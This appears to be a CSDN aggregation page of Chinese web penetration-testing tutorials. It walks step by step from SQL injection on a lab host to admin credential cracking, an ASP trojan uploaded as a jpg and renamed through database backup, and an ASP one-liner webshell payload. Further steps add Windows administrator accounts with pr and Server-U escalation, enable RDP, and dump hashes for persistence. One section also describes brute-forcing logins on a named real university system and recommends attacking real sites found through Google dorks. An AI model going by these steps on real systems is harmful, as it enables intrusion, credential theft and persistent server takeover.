web渗透测试_web渗透测试教程百度云 - CSDN
精华内容
参与话题
  • Web完整渗透测试实例

    千次阅读 2019-07-08 10:27:22
    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限; (2)学习渗透测试完整...

    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。

    目的:
    (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限;
    (2)学习渗透测试完整过程
    原理:
    黑客通过挖掘网站的注入漏洞,进而获得管理员账号密码进去后台,通过数据库备份,拿到webshell;然后黑客登录shell,通过2003服务器的提权exp拿下服务器的权限。

    1.检测网站安全性

    进入测试网站http://192.168.1.3界面
    在这里插入图片描述
    寻找漏洞,我们先用软件扫描,然后找到链接来测试,在浏览器打开http://192.168.1.3/see.asp?ID=461&titleID=86这个链接
    在这里插入图片描述
    在链接后面加 ‘ ,页面报错
    在这里插入图片描述
    由上图可知直接提示数据库错误界面,判断可能存在注入漏洞。我们在浏览器输入http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=1
    在这里插入图片描述
    我们再在浏览器输入http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=2
    在这里插入图片描述
    返回错误页面,在链接尾部输入and 1=1 和and 1=2返页面不同,由此我们判断这个站点存在SQL注入漏洞。

    2.使用工具破解管理员用户、密码

    打开啊D注入工具
    在这里插入图片描述
    把存在注入点的URL复制到啊D注入工具中,选择左侧的SQL注入检测,点击检测,在数据库的下方会提示我们数据库的类型等内容
    在这里插入图片描述
    点击检测表段,就是检测数据库所有表名
    在这里插入图片描述
    我们点击admin表,然后点检测字段
    在这里插入图片描述
    选择password和admin字段,再点击检测内容,暴出字段内容即破解用户名和密码
    在这里插入图片描述
    3.使用工具破解MD5密码

    我们得到的密码是用MD5加密的,我们通过MD5破解软件进行破解
    在这里插入图片描述
    由此,我们得到网站管理员的账号密码为linhai 123456
    4.登录网站管理后台

    我们用软件来探测网站管理后台,打开御剑后台扫描工具
    在这里插入图片描述
    把网站URL http://192.168.1.3输入工具中,点击开始扫描
    在这里插入图片描述
    通过扫描结果,我们猜测后台登录URL为http://192.168.1.3/admin/Login.asp
    在这里插入图片描述
    用破解的管理员账号linhai和密码123456成功登录后台
    在这里插入图片描述
    5.拿到网站webshell

    我们进入到网站管理后台,我们需要拿到webshell,本例中先打开系统管理,选择文章管理,打开上传图

    在这里插入图片描述
    我们直接上传asp木马试试
    在这里插入图片描述
    在这里插入图片描述
    我们把木马后缀名改为mm.jpg
    在这里插入图片描述
    在这里插入图片描述
    上传成功后,右键照片属性,看下它上传的位置记录下来,http://192.168.1.3/admin/Upfiles/201873091139.jpg
    在这里插入图片描述
    我们上传成功后,因为上传的是图片,不能解析成木马脚本,正好我们这个网站有备份数据库功能,我们可以通过数据备份的方式,重新命名脚本文件,使其能够作为木马脚本被执行。我们点击左侧的数据管理,选择备份/恢复数据库
    在这里插入图片描述
    在备份数据库中,数据库路径后面,填上我们刚刚上传图片的地址:…/admin/Upfiles/201873091139.jpg;在备份的数据库路径后面填写…/db/1.aspx。这样做的目的是把我们上传的jpg后缀的木马,重新备份成aspx文件,使我们的木马能够正常运行。
    在这里插入图片描述
    我们点击备份后,访问http://192.168.1.3/db/1.aspx就是我们的木马地址了,木马的密码是77169,至此,我们就拿到了这个网站的webshell
    在这里插入图片描述
    在这里插入图片描述
    6.拿到服务器权限

    进入webshell后,我们需要执行dos命令来添加管理员。点击webshell上端的命令行,进入执行命令模式
    在这里插入图片描述
    尝试执行whoami命令,查看下我们是什么权限

    在这里插入图片描述
    我们发现回显的是network service权限,在此权限下是不能直接添加管理员账户的,我们添加账户时,回显是空白,证明我们无法添加用户
    在这里插入图片描述
    点击端口扫描,再点击扫描,发现系统开放着43958端口,即server-u服务

    在这里插入图片描述
    点击SU提权,在cmdshell中输入命令net user aaa 123456 /add,然后点击执行
    在这里插入图片描述
    在cmdshell中输入命令net localgroup administrators aaa /add,然后点击执行
    在这里插入图片描述
    在cmdshell中输入命令net user,然后点击执行,查看aaa用户是否添加成功
    在这里插入图片描述
    在cmdshell中输入命令net user aaa,然后点击执行,查看aaa用户属于administrators用户组
    在这里插入图片描述
    点击开始->运行->mstsc->192.168.1.3->输入账号aaa和密码123456,点击登录
    在这里插入图片描述

    有疑问请加QQ群:894922931 咨询
    文章转载 侵权立删

    展开全文
  • web渗透测试常规套路

    万次阅读 多人点赞 2017-08-22 10:51:48
    本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识...

    注:文章首发自合天智汇微信公众平台

    0x01:本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透测试网站的不可或缺的利器之一。

    另:面向学生的CTF,出题者考虑到学生的实操能力,设计的web题,或者拿服务器找flag的大题大部分用本文介绍的思路、工具就能成功cpature the flag。

    说明:此次环境来自某网站的靶场,因为比较经典,所以 笔者将以此为例介绍web渗透测试中需要涉及的套路、工具等。网络安全法出来了,刚入门的小白就不要去动真实的网站了,不然真是从入门到入狱了。

    场景模拟:此刻你已获权测试某网站,你将在接下来的一段时间里进行测试,注意不要泄露网站敏感数据,所以接下里的所有图片将会以打码方式呈现

    准备工作:

    准备好以下工具:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等

    拿到一个网站,首先我们最容易想到的就是扫描目录。

    最常用的工具是御剑,页面如图
    这里写图片描述

    在域名空格中输入我们测试的网站的域名,点击开始扫描即可
    这里写图片描述

    我们在结果中发现/admin,这疑似后台页面,双击该链接进入,看看判断是否正确
    这里写图片描述

    可以看到确实是后台登陆页面

    这里写图片描述

    找到后台登陆界面了,接下来我们就需要登陆的用户名和密码了,所以寻找用户名和密码就是我们下一步的工作

    这一步我们用到的工具是Domain3.6,界面如图

    这里写图片描述

    点击SQL注入—》批量扫描注入点—》添加网址,输入网址

    这里写图片描述

    点击OK,然后点击批量分析注入点

    这里写图片描述

    得到结果如图

    这里写图片描述

    点击OK关闭弹窗,在注入点栏目下随机选择一条,右击选择“检测注入”

    这里写图片描述

    如图所示

    这里写图片描述

    点击“开始检测”,得到结果如图

    这里写图片描述

    点击“猜解表名”

    这里写图片描述

    在结果中选择admin
    这里写图片描述

    选中admin后点击猜解列名

    得到结果如图

    这里写图片描述

    Username,password是我们需要的信息,所以在前面的方框中勾选,点击猜解内容,如下图

    这里写图片描述

    结果如下图,成功得到用户名和密

    这里写图片描述

    不过密码很明显是md5加密后的

    我们在Md5在线解密网站中解密即可

    这里写图片描述

    得到结果,明文密码为admin888

    现在有了用户名和密码,我们就返回后台登陆页面

    输入信息后成功登陆
    这里写图片描述

    成功进入后台
    这里写图片描述

    接下来我们需要获取webshell,这一步仁者见仁智者见智,需要凭借个人的经验来多次尝试分析确定

    此处仅提供个人思路

    我们点击左侧的“系统设置管理”—》“网站信息配置”
    这里写图片描述

    在公司名称处将原信息删除,换成我们的一句话木马

    “%><%Eval Request(Chr(35))%><%’

    (解释:1.句首和句尾的引号用于闭合语句,2.Request()中的内容即连接菜刀时需要的密码,此处用的Chr(35)指的是ascii值为35的符号,即#,3.Eval Request()是asp一句话木马的常用格式)
    这里写图片描述

    点击保存设置

    接下来的步骤是连接菜刀

    打开菜刀,界面如图
    这里写图片描述

    在空白处右键,添加,在弹出框中输入地址及密码(之前说过为#
    这里写图片描述

    这里小白白们可能会问了,为什么地址后面的/inc/config.asp之前没有见过呢?

    是这样的,这个网站用的是魅力企业网站管理系统(一个cms),我们可以在网上下到它的源码,可以看到它整个的目录结构,自然会明白我们修改的一句话的目录在/inc/config.asp

    输入信息后点击添加,发现连接成功

    注意:一般的CTF比赛,做到这个程度就可以在各个目录里找flag了,不过这次我们把整个渗透流程介绍完

    接下来我们需要提权,那么就需要通过菜刀上传提权工具,这里上传的位置要选好,一般而言,c盘的子目录中的文件可执行的可能性较大

    提权经典的搭配是cmd+3389+pr,我们这里就用这个组合,同时选定上传目录为C:\RECYCLER
    这里写图片描述

    直接将我们需要用到的工具pr,3389,cmd选中后拖进即可
    这里写图片描述

    可以看到已经上传成功

    选中cmd,右击选择虚拟终端,打开如图所示页面

    这里写图片描述

    敲回车后开始输入我们的命令

    这里写图片描述

    来切换到我们提权工具所在的目录

    这里写图片描述

    我们开始使用pr创建用户,用法如图

    这里写图片描述

    注意,虽然pr “net user yale 888 /add”执行后提示命令成功完成,为了确认,我们可以输入pr “net user”确保确实成功添加该用户(用户名yale,密码888)

    接下来我们尝试将yale添加到系统管理员组

    同理,第二条命令是为了确保添加成功

    既然添加成功了,我们接下来就开启3389
    这里写图片描述

    我们win+r,打开运行框后输入mstsc,打开远程桌面连接

    在空白框中输入ip即可开始连接

    点击连接后弹出认证界面,输入我们创建的用户名和密码

    这里写图片描述

    点击确定即可成功登陆

    这里写图片描述

    接下来我们需要想到这个问题:以后远程登陆难道及靠我们自己创建的帐号吗?要是哪天被管理员发现了,那怎么办,所以长久之计是在获取系统管理员的密码后删除自己创建的用户

    那么,接下里我们要做的就是找到系统管理员的密码

    我们这里用到的工具是quarksdump,还是和前三个工具一样,拖到菜刀里直接上传

    这里写图片描述

    我们在远程连接的服务器中打开cmd窗口

    这里写图片描述

    进入recycler目录看到工具已上传

    这里写图片描述

    输入quarkspwdump.exe回车后立刻弹出如下窗口
    这里写图片描述

    输入如图命令,回车即可得到

    我们看到最下面一列是Administrators跟随的一串字符,这其实也是一串hash加密过的密码值(Windows系统下的hash密码格式为:用户名称:RID:LM-HASH值:NT-HASH值),解密得到

    这里写图片描述

    密码为cu9e2cgw

    渗透测试结束。

    此刻不要忘了按照规范整理一套完整的安全报告以及可行的修补建议并提交给甲方。

    0x03
    总结:一次典型的渗透测试的过程就是如上所示,主要思路为

    扫后台—找注入点获取后台登陆密码—上传一句话木马—菜刀连接—提权—拿服务器获取系统管理员密码

    用到的工具有:御剑、明小子、菜刀、pr、3389、cmd、quarkspwdump等

    本文仅做技术分享及普及渗透流程之用,如有人企图以此来进行不合法的渗透等破坏网络安全的行为与本文作者无关,特此声明

    展开全文
  • 小白入坑 Web 渗透测试必备指南

    万次阅读 多人点赞 2017-11-23 09:14:40
    渗透测试入坑必备指南」,「阅读原文」查看交流实录 「文末高能」 编辑 | 黑石 小白如何快速入门 由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我。再者,内容不会完全讲...

    640.gif?wxfrom=5&wx_lazy=1

    本文来自作者 肖志华 在 GitChat 上分享「Web 渗透测试入坑必备指南」,阅读原文」查看交流实录

    文末高能

    编辑 | 黑石

    小白如何快速入门

    由于本人技术性受限制,可能部分内容显得不那么清晰,如有疑问请读者圈联系我。再者,内容不会完全讲清楚,因为本身话题的原因,部分会一笔带过。

    小白该如何踏入 Web 安全这个坑呢?我的经历是,兴趣所在。我是野路子,全靠兴趣来自学。

    现 Web 安全如果要讲入门,要求并不高,两三天就能入门,而我也仅在入门级别。

    我接触这个比较早,最初是在10年还是09年来接触到一份网传 Web 渗透课,后沉迷于此。

    期间玩的第一个靶机是 dedecms5.7 最新 sql 注射漏洞利用,当时并不懂什么技术性的东西。然后一直没怎么学过,学习资源有限也就停了。

    安全问题都体现在输入输出的问题上,能够分析数据流就有迹可循了。先学会用工具,工具报什么漏洞你就应该学着去百度这个漏洞,了解并且复现它。

    在复现的过程中,势必会遇到很多以前从未遇到的问题,这时候就要学着用谷歌去解决问题。你能遇到的问题,别人也许也遇到了,并且做了记载。

    向记录学习过程中的问题并解决的博主致敬!

    Web 知识本身就非常丰富,覆盖范围也非常广泛:

    • 从浏览器到服务器、数据库;

    • 从 HTML、JavaScript 和 CSS 到 PHP、Java、ASP(.net);

    • 从页面加载到 DOM 渲染;

    • 从静态页面到 MVC;

    • 从 URL 协议到 HTTP 协议。

    我相信大多数人如果没有前端的经验,想入这个坑,先学前端就已经要崩了,但是并不需要一次性学这么多。

    了解基本攻击类型,再去复现它,不断学习,不断进步,在疑惑中解决问题,在解决问题中成长并积累经验,这就是我告诉大家的方法,无捷径可走。

    请务必实战,不实战,单理论的话,容我说一句放屁!再牛的前端,不关注安全技术,也能倒在前端 Xss 攻击上。

    Web 安全高手都是实战练出来的,漏洞喂出来的。切莫想快速入门。快速如果定义在三个月,每天12小时用来研究 Web 安全,我估计也够入门了。

    安全圈特别浮躁,很难有一个静心的交流环境,无数交流环境都是被发表情混水坑死的。所幸有 Gitbook 这样技术氛围丰厚的社区,很实在。

    摸漏洞摸久了,经验自然也就丰富了,前些天我挖了 Csdn 一波储存性XSS,危害是劫持任意用户登陆会话,已经上报并修复。

    出于原则不能公开漏洞详情,留个链接做证明吧。http://my.csdn.net/rNma0y  访问此条链接即可。

    最后一句话做总结:“整就牛!”

    Nmap 的使用

    Nmap 作为一款端口扫描软件,可以说是目前最强大的端口扫描工具,更是很多安全从业者所必备的工具。

    Nmap的安装教程请自行安装,有 Windows 系统的也有 Unix 以及 Mac。

    Nmap的扫描方式有很多,包括 TCP Syn TCPACK 扫描等,使用也比较简单,仅仅需要几个参数。扫描指定IP开放的端口:

    nmap -sS -p 1-20000 -v 220.176.172.178

    表示使用半开扫描,系统很少会保存日志。扫描C段主机:

    nmap -sP 220.176.172.178/24

    0?wx_fmt=png

    这里给出的结果是C段存在256个主机,方便我们后期对目标进行C段渗透。指定端口扫描 :

    nmap -p 80,8080,22,445 220.176.172.178

    指定端口扫描和半开结果类似,故不贴图。扫描主机操作系统:

    nmap -o 220.176.172.178

    扫描全部端口:

    nmap -v -A 220.176.172.178

    0?wx_fmt=png

    这里可以看到初步就已经判断出来了 23端口和8888端口都是使用tcp协议。后面他会自行进行Syn的扫描,结果较慢,故不在等待。

    0?wx_fmt=png

    这是全端口扫描得出的结果,但是要注意的地方是,他只是默认的1000个高危端口扫描,若要检测全部端口,还需要加入-P-这个参数才行。

    Namp 的命令很多,我这里只是列举了常用的几个命令,需要查看更多命令的请百度 namp 的官网进行命令手册翻阅。

    Safe3

    Safe3 作为一个国产的漏洞扫描工具,和 Appscan 来做比较还是有些不足。虽有不足,但依然无法阻止众多安全从业者的使用。我用 safe3 第一个印象就是觉得,快。

    在 Windows 平台下,打开速度和扫描速度是非常之快的。

    0?wx_fmt=png

    这就是 safe3 的全面貌,中文界面,做用户的友好性十分的强。操作也比较傻瓜的,填入扫描的网站地址后,选择需要扫的漏洞就行。

    0?wx_fmt=png

    由图可见,扫描结果显示的是sql注入的漏洞,但是safe3这款工具误报性个人觉得是相当的高,笔者也很少使用,只是有时候拿来扫个后台地址而已。

    Sqlmap

    qlmap 作为一款强势的 sql 注入攻击工具,其功能性之强是其他 sql 注入工具所无法比拟的。如果要说缺陷,那就是众多的参数以及英文界面。

    sqlmap 是一款非常强大的开源 sql 自动化注入工具,可以用来检测和利用sql注入漏洞。它由 python 语言开发而成,因此运行需要安装 python 环境。

    我这里是 KaliLinux2.0 系统,已经集成了 sqlmap,所以 Windows 平台的朋友需要安装 Python 环境才能运行。检测注入点是否可用:

    这里需要用到参数:-u
    -u:指定注入点URL

    0?wx_fmt=png

    这里是在进行注入测试了,如果存在注入,那么应该返回该网站的应用程序详:

    0?wx_fmt=png

    这里返回了服务器系统2008 ,web 容器为 IIS7.5,脚本语言是 asp 的,数据库为 SQLserver 2005 版本。

    1. 列出该数据库中的所有数据库名称

    参数: —dbs

    0?wx_fmt=png

    0?wx_fmt=png

    上图所显示的就是我们在输入了 —dbs 参数后,sqlmap 列出的所有数据库,也叫做爆库。

    由于我 Kali 下开的 sqlmap 太多了,我又找不到那个命令窗口,就拿个新的网站来做接下来的例子。

    2. 列出当前程序所在的数据库

    参数:—current-db

    0?wx_fmt=png

    图中已经列出了当前应用程序所使用的数据库是“vps415”。列出指定数据库的所有表。

    sqlmap -u “http://www.hkmsedu.com/class.php?id=121“ -D vps415 —tables

    —tables 参数便是用来获取数据库表,-D参数为指定的数据库,结果如下:

    0?wx_fmt=png

    3.读取指定表中的数据

    sqlmap -u “http://www.hkmsedu.com/class.php?id=121“ -D vps415 -T book —columns

    参数为:—columns

    结果如下:

    0?wx_fmt=png

    4. 读取指定字段及内容

    0?wx_fmt=png

    参数为:-C 指定字段名称,-T指定表名,-D指定数据库名,—dump 为保存数据。

    Sqlmap 会把数据保存在文件夹下,已cvs文件后缀。

    0?wx_fmt=png

    到此,就已经完成了用 sqlmap 进行 sql 注入的一个完整过程,sqlmap 参数还有很多,如需深入了解,请自行查阅官方命令手册。

    APPscan

    APPscan 的界面如下,很简洁

    0?wx_fmt=png

    进入配置向导界面,如下所示。

    0?wx_fmt=png

    选择 WEB 扫描,同时他也可以扫描 Web Services,我们选一个 Web 站点进行扫描。

    0?wx_fmt=png

    然后一路回车即可。扫描专家建议就是一个建议程序,可开可不开。扫描过程如下:

    0?wx_fmt=png

    APPScan 的界面非常简单,左上角是基于 URL 的爬行参数,左下角仪表盘是总的安全报告。又侧则是风险详情信息。下面便是扫描结果,可以看到这个站已经存在 SQL 盲注以及 SQL 注入等网站安全问题。

    0?wx_fmt=png

    旁边可执行一些手动语句的测试来验证漏洞是否存在。以上漏洞可一个一个的去手动复现,到此,AppScan 就已经完成了一次自动化的扫描过程。

    Appscan 和 WVS 类似,不过是英文界面,所以我选了 AppScan 来做实例,并不是 WVS 不及 Appscan。

    重点来喽,作为一名渗透测试人员,Burpsuite 工具可以说是在众多工具中位列榜首可是神器呢,基本以后的安全测试之路都需要用这款工具去操作。所以学好 Burpsuite 的使用是非常重要的。

    Burpsuite

    有两个版本,一个是免费版,一个是Pro(Professional)版,相比只有一个功能差距,免费版不带扫描功能,Pro版则有扫描功能,但是,作为一个优秀的安全工具,Pro版则是太贵,我记得正版需要 2000 来块人民币(买不起),所以就自然有了破解版,我手中这款 1.7.11就是Pro破解版(羞耻)。

    0?wx_fmt=png

    首先,界面如上,功能模块包括 taeget、proxy、spider、Scaneer、intuder、Repeater 等模块。

    由于1.7.11版本字体设计有些许问题,所以下面用1.58版本展示。

    首先,选入“Options”模块,进入“Display” Display 模块,找到第二栏,“Http Message Display”,选择字体为“微软雅黑”,改这个设置的原因是,后面的 HTTP 请求消息如果中文可能会乱码。

    0?wx_fmt=png

    然后,进入“proxy”,遂“options”,第一栏,设置你的代理IP地址,因为他本质就是个浏览器操作后截获数据进行分析,需要用代理来。

    具体代理信息可以转到浏览器代理 IP 设置的方法。我这里以 Edge 为例。

    设置-高级设置-代理设置-打开代理设置即可。如下图:

    0?wx_fmt=png

    这个代理设置要和 burp 上的设置一样才能抓到HTTP响应哦~

    接下来,我们看 intercpt 功能,也就是最基础的功能,抓取当前页面的http请求。

    0?wx_fmt=png

    如果以上设置没有问题了,那么你应该会成功访问该目标地址,我这里测试的是“gitbook.cn”。

    访问的同时,我点击了 intercept is 模块  Is off Is on 分别关,开两种状态。我这里选择了on,那么这个页面的 HTTP 请求将被显示到 burp 中的这个模块下。

    0?wx_fmt=png

    上面就是显示的内容了,可以看出上面信息呢?请求来自http://gitbook.cn:80,开放了80端口,IP地址为[123.59.80.114.]。

    请求是GET的,协议是 http1.1 而不是 http2.0,http状态码是200,表示返回成功。请求页面是 http://gitbook.cn/。

    下面较为重要的信息就是 cookie 等登陆信息。通过对截获的http信息,一般就能看出一些安全问题。下面用实例+抓包请求信息来介绍,我经常用到的 intruder 模块使用。

    Intruder,字面解释为入侵者,解释完美的诠释了这个模块是多么的爆炸。案例诠释 Burp 的爆炸功能。

    我的测试目标是一所高校,拿到所在的域名之后,首先进行了扫描器的自动化扫描,并且我自己也开始进行手动测试,从该高校的官网,爬到了一处OA系统,OA系统为自主开发,并不是什么市面上的A8之类。

    0?wx_fmt=png

    访问到这个页面的时候,我的第一想法是,应该可以成功渗透。

    因为无验证码,无权限控制,这样也就提供了爆破的信息,爆破也就恰恰是我所要讲的 burp 中的 intruder 模块功能之一。

    随便输入账号密码后,我们来看看网页访问请求。

    0?wx_fmt=png

    可以看到,截获到的 http 请求页面如上,aspx(Asp、net)的脚本语言。

    0?wx_fmt=png

    账号和密码ID分别都是 6666,明文传输。我就很奇怪,为什么要很多涉及到登陆的网页,不肯做一点点加密?

    哪怕是 base64 编码后再传入也好啊。但事实就是这样,明文传输。

    0?wx_fmt=png

    我们右键,选择 Ctrl+R,发送到 Repeater 模块来分析登陆响应。点击左上角 GO 即可。

    0?wx_fmt=png

    在 params 模块下,可以更改你的输入参数,用于测试不同的参数会返回什么内容,但是需要每次修改后都点击 Go,用于测试。

    0?wx_fmt=png

    如上图,我修改了 txtuserld 为 admin password 保持了 6666 不变 点击 GO 后的结果。一串乱七八糟的,待会我们再提。

    回到 intercept 模块下,我们选择 Ctrl+I,发送到 intruder 模块下,进行猜解用户名和密码。

    0?wx_fmt=png

    上图所示,positions 模块下显示具体参数,标黄的(用黄色字体颜色显示出来的)都是变量参数,我们猜解用户名和密码则需要指定一些参数。

    右边的“clear”,则是清除所有参数,清除后会去掉所有变量(颜色),选中你需要的参数,然后选择“Add”就可以指定该参数为变量。

    我指定了用户名作为变量参数,其余不变。意味着 txtuserld:admin   txtpassword:123456  其中 userld 中的 admin 参数为变量。

    有的读者可能奇怪,为什么我这里要设置用户名为变量呢。

    因为考虑到我的测试目标是 OA 系统,OA 系统为多人办公系统,在线人数几百人。用户名不止一个 admin,如果选择 admin,可能会出错。

    所以我的思路是爆破他的账号,所以我选中了 admin 做变量,而不是爆破他的密码。相比之下去选择一批账号进行爆破,成功率远远比一个账号成功率高了太多。

    也要结合实际环境来测试,比如网站后台,只有一个 admin 管理员账号的情况下,显然我这种情况是不合适的。

    0?wx_fmt=png

    变量设置完毕后,选择 payloads,来进行字典的配置,payload Sets 就是攻击类型,有多重变量的情况下,可以选择。

    比如账号和密码都为变量,如果测试一个字典则不显得那么机智,需要字典在两个变量之间相互测试,就用到这个功能模块,这里我们不做测试,遂跳过,保持默认就好。

    在字典装好后,在这个模块的旁边有个options模块,这里用来更改类似于线程的参数。

    在第二栏有个 Request Engine 参数,这里第一栏是 Number of threads 默认是5。

    这个意思是,线程。默认5线程进行攻击,这个更改需要根据网站的配置和字典的数量,如果网站配置好,请往上加,如果不好,跑一跑就会跑坏,那么就默认。

    0?wx_fmt=png

    我设置的线程为50,设置完了后,就可以点击左上角的 intruder,选择第一个了。

    0?wx_fmt=png

    开始进行爆破,我这里导入的是弱账号 top500,通过几秒钟的碰撞后, length 的返回数字头中,包含了 2910-2973. 唯独出现了一个“liujuan”的 ID 返回了 3391 数字头。

    这个账号有点可疑,我们放到前面所讲的 Ctrl+R 中来分析一下。

    0?wx_fmt=png

    更改 uid 后,点击 Go,返回了 http 信息,如上图,基本可以判断这个账号就是正确的账号,已经成功爆破出来,为了验证猜想,我们使用该ID进入网页。

    0?wx_fmt=png

    如上图,测试已经成功,burpsuite 就是这么暴力的一个安全测试工具,这只是其中几个模块,真正玩的转的人,很少。

    个人觉得能玩转 burp 的所有功能,得花好几个月来专门学习 burp 这方面的资料,遗憾的是市面上还没有一本关于 burp 的工具书,如果有大神愿意写,那是自然最好的。

    通过以上学习,能基本掌握这几款工具的用法了,当然不能说之能成功渗透目标了,因为这只针对无访问控制,无验证码,存在弱口令的网站情况。

    通过案例学习,开发者也应该明白,怎样去做才能更加安全,为用户保驾护航。

    案例是哪个高校,我就直说了,属于云南大学主站,这个漏洞,我在80天前就已经提交给漏洞平台了,他们也整改了,今天写下这篇文章的时候是2017年11月1日22:11:05,我万万没想到,整改是指哪改哪的姿势。

    安全问题万万不可指哪改哪,我当时提交的另一个账号的弱口令,但是我明明确确的是写了属于逻辑漏洞,整改意见清清楚楚写上了“增加验证码效验机制防止爆破”。

    但他们只改掉了出问题的那个账户的密码……

    所以我很多时候不能理解厂商的态度,加个验证码效验如此简单的事情,非得让攻击重新发生一次。
    是不是一定要等用户数据泄露,企业等遭受致命打击才能明白信息安全的重要呢?

    白帽子的测试是否合法,边界在哪里?

    相信这是很多人都关心的问题,从白帽子袁炜的事件来说(该白帽子挖世纪佳缘的漏洞并通知该厂商后被世纪佳缘起诉),白帽子的的边界在哪?

    严格来讲,只要没有授权的测试,都是违法的,属于未授权访问,如果追究这罪名就可以吃。

    授权测试比如什么呢?漏洞平台的 SRC,比如京东,小米等 SRC 是鼓励白帽子挖洞提交的,确认后甚至会送你小礼物,这些厂商建立的 SRC 平台,是有些许合法授权的意思。(个人认为)

    白帽子做测试都应当遵守一个原则,点到为止,即:我只证明漏洞的存在,不会真正的实施破坏或者利用。未修复的漏洞,不应当公开其详情。所以我想厂商不会通过司法途径解决。

    但是,如果你在找到SQL注入点后,进行了数据修改读取并且下载到本地,这就是脱库行为,有这种行为,就触犯了边界,那么厂商可以报警了,并且你也存在犯罪行为。

    有时候,厂商也不必这么小气,不存在边界行为就不用报警,不要人家证明了你网站有漏洞后,你悄悄修复了,然后报警。

    网站有漏洞是好事,一般来说白帽子的检测并没有给厂商带来多大损失,入侵本身也没有明显恶意,还主动告知漏洞及修补方案,大多数通情达理的厂商都不会选择走法务。

    白帽子并不是一个人在战斗,随意抓人的后果可能会触怒其他白帽子,对厂商些许会带来相应损失。

    比如,挖到洞后不再提交,直接互联网匿名公开呢?送个小礼物表示一下是不是比冰冷手铐好太多了?

    找好边界,尤其重要。

    OWASP top10

    官方网址可以看这里:https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

    2017年的十大风险已经选出来了。分别是:

    1. 攻击注入漏洞

    2. 失效的身份认证和会话管理

    3. 跨站脚本 Xss

    4. 失效的访问控制

    5. 安全配置错误

    6. 敏感信息泄露

    7. 攻击检测与防范不足

    8. 跨站请求伪造(CSRF)

    9. 使用含有已知漏洞的组件

    10. 未受保护的 API。

    这些内容我就不贴出来了,我把官方的 PDF 文档发送到读者圈提供阅读理解。
    相信官方的解释也比我解释的更好。

    挖到洞该怎么办?

    很简单,0day 就刷一波积分,不是通用性就上交国家啦~

    练手靶机

    本地环境推荐使用DVWA进行模拟攻击操作练手,该系统包含了很多Web漏洞,便于复现。
    真实环境请用谷歌hack语法搜索网站程序进行实机攻击。

    个人推荐书单

    学安全务必啃书,书中的知识结合实战经验会让你了解的更彻底也更快。

    0?wx_fmt=png

    这是我目前在看的一系列丛书,要推荐大概就这些吧。《Web 安全深度剖析》是本好书,入门就靠这书带。《黑客攻防技术宝典 Web 实战篇第二版》也值得看,就是内容太多,歪果仁写的。

    接着就是道哥的《白帽子讲 Web 安全》啦~前端黑客可看余弦大大的 Web 前端黑客技术揭秘。双十一我自己入了 Python 和几套散文集。

    最后,需要用到以上工具的读者圈联系我,链接不放了。祝大家想往这条路上走的人越走越远。

    近期热文

    前端工程师“应试”指南

    如何用 Node.js 爬虫?

    两款敏捷工具,治好你碎片化交付硬伤

    改做人工智能之前,90%的人都没能给自己定位

    想入行 AI,别让那些技术培训坑了你...

    通知

    个人和企业的信息泄露到今天已经严重到了什么程度?

    严重到只要想查,就可以用各种社会工程学的方式来了解你的大部分信息。

    在网络环境里,如果不会用手段保护自己,那和“透明人”没什么两样。

    0?wx_fmt=jpeg

    「阅读原文」看交流实录,你想知道的都在这里

    展开全文
  • Web完整渗透测试实例(windows)

    千次阅读 2019-09-03 11:58:22
    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。 目的: (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限; (2)学习渗透测试完整...

    学习一整套的web渗透测试实验对以后的测试工作很有帮助,所以我把学习环境中的实现写下来,提供对整个网站测试的经验。

    目的:
    (1)了解黑客是如何通过漏洞入侵网站,并获得服务器权限;
    (2)学习渗透测试完整过程
    原理:
          黑客通过挖掘网站的注入漏洞,进而获得管理员账号密码进去后台,通过数据库备份,拿到webshell;然后黑客登录shell,通过2003服务器的提权exp拿下服务器的权限。

    1.检测网站安全性

    进入测试网站http://192.168.1.3界面

    寻找漏洞,我们先用软件扫描,然后找到链接来测试,在浏览器打开http://192.168.1.3/see.asp?ID=461&titleID=86这个链接

    在链接后面加 ‘ ,页面报错

    由上图可知直接提示数据库错误界面,判断可能存在注入漏洞。我们在浏览器输入http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=1

    我们再在浏览器输入http://192.168.1.3/see.asp?ID=461&titleID=86 and 1=2

    返回错误页面,在链接尾部输入and 1=1 和and 1=2返页面不同,由此我们判断这个站点存在SQL注入漏洞。

    2.使用工具破解管理员用户、密码

    打开啊D注入工具

    把存在注入点的URL复制到啊D注入工具中,选择左侧的SQL注入检测,点击检测,在数据库的下方会提示我们数据库的类型等内容

    点击检测表段,就是检测数据库所有表名

    我们点击admin表,然后点检测字段

    选择password和admin字段,再点击检测内容,暴出字段内容即破解用户名和密码

    3.使用工具破解MD5密码

    我们得到的密码是用MD5加密的,我们通过MD5破解软件进行破解

    由此,我们得到网站管理员的账号密码为linhai 123456

    4.登录网站管理后台

    我们用软件来探测网站管理后台,打开御剑后台扫描工具

    把网站URL http://192.168.1.3输入工具中,点击开始扫描

    通过扫描结果,我们猜测后台登录URL为http://192.168.1.3/admin/Login.asp

    用破解的管理员账号linhai和密码123456成功登录后台

    5.拿到网站webshell

    我们进入到网站管理后台,我们需要拿到webshell,本例中先打开系统管理,选择文章管理,打开上传图

    我们直接上传asp木马试试

    我们把木马后缀名改为mm.jpg

    上传成功后,右键照片属性,看下它上传的位置记录下来,http://192.168.1.3/admin/Upfiles/201873091139.jpg

